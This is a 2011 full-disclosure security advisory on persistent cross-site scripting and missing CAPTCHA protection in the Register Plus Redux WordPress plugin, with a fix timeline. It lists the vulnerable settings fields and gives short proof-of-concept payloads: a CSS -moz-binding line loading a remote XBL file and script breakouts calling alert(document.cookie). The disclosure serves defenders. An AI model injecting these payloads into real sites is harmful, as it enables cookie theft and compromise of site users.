Date: Sat, 31 Dec 2011 19:33:21 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS and IAA vulnerabilities in Register Plus
	Redux for WordPress

Hello list!

I want to warn you about multiple new vulnerabilities in plugin Register
Plus Redux for WordPress. Last version of the plugin was checked. This is
second advisory concerning new vulnerabilities in Register Plus Redux.

These are Cross-Site Scripting and Insufficient Anti-automation
vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are Register Plus Redux v3.7.3.1 and previous versions.

By request of my client I've made new version of the plugin with fixing of
all vulnerabilities, which I found. I named this version as Register Plus
Redux 3.8 (to distinguish between it and original version of the plugin). So
all users of this plugin can find new and secure version of the plugin in
Internet.

----------
Details:
----------

Persistent XSS (WASC-08):

There are the next vulnerabilities at page
http://site/wp-admin/options-general.php?page=register-plus-redux.

In fields: Email Verification, Admin Verification, User Message (if set
Custom New User Message), User Message (if set Custom Verification Message),
Admin Message (if set Custom Admin Notification), Custom Register CSS,
Custom Login CSS:

The code will work at page
http://site/wp-admin/options-general.php?page=register-plus-redux, and in
case of fields Email Verification and Admin Verification also will work at
page http://site/wp-login.php?checkemail=registered.

If to set the code in fields Custom Register CSS, Custom Login CSS:
body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

The code will work accordingly at pages
http://site/wp-login.php?action=register and http://site/wp-login.php. The
code will work in Firefox < 3.0, but if to place xml-file at the same site
(via uploader), then it'll be possible to attack also Firefox 3.0 and
higher. And if to set the code with using of expression, javascript or
vbscript in styles, then it'll execute in IE.

If to set the code in field Minimum password length (in User Set Password)
at set options Require new users enter a password during registration and
Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1

The code will work at page http://site/wp-login.php?action=register.

If to set the code in fields Empty, Short, Bad, Good, Strong, Mismatch (in
User Set Password) at set options Require new users enter a password during
registration and Show password strength meter:
"};alert(document.cookie);/*

The code will work at page http://site/wp-login.php?action=register.

If to set the code in field Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)

The code will work at page http://site/wp-login.php?action=register. The
code will work in Firefox < 3.0, but if to place xml-file at the same site
(via uploader), then it'll be possible to attack also Firefox 3.0 and
higher. And if to set the code with using of expression, javascript or
vbscript in styles, then it'll execute in IE.

Strictly Social XSS persistent (WASC-08):

In above-mentioned fields User Message (if set Custom New User Message),
User Message (if set Custom Verification Message), Admin Message (if set
Custom Admin Notification) besides XSS in field itself, there is also XSS
via visualization (which is going via jQuery), and so at sending of POST
request the code will execute twice, and it's needed to fix every of these
vulnerabilities in two places (because even escaped code will execute).
Besides an attack via sending POST request, it's possible to conduct XSS
attack via visualization in these three fields, and also in nine other
fields (From Email, From Name, Subject in Custom New User Message, in Custom
Verification Message and in Custom Admin Notification) at pasting of XSS
code in the field.

I.e. it's needed fraudulently to force a victim to paste code in any of
these 12 fields, at that the code can be put in clipboard of a victim via
attack via clipboard
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html).
These vulnerabilities - it's Strictly social XSS
(http://websecurity.com.ua/5476/).

Insufficient Anti-automation (WASC-21):

http://site/wp-login.php?action=register

In registration form there is no protection against automated requests
(captcha). As in previous versions of the plugin.

------------
Timeline:
------------

2011.11.25 - found vulnerabilities.
2011.11.30 - fixed vulnerabilities.
2011.11.30 - Informed developer.
2011.11.30 - released Register Plus Redux 3.8 (with fixed all
vulnerabilities of version 3.7.3.1).
2011.12.01 - announced at my site.
2011.12.05 - released Register Plus Redux 3.8.1 (with new features).
2011.12.31 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5536/

Best wishes & regards,
MustLive
Administrator of Websecurity web site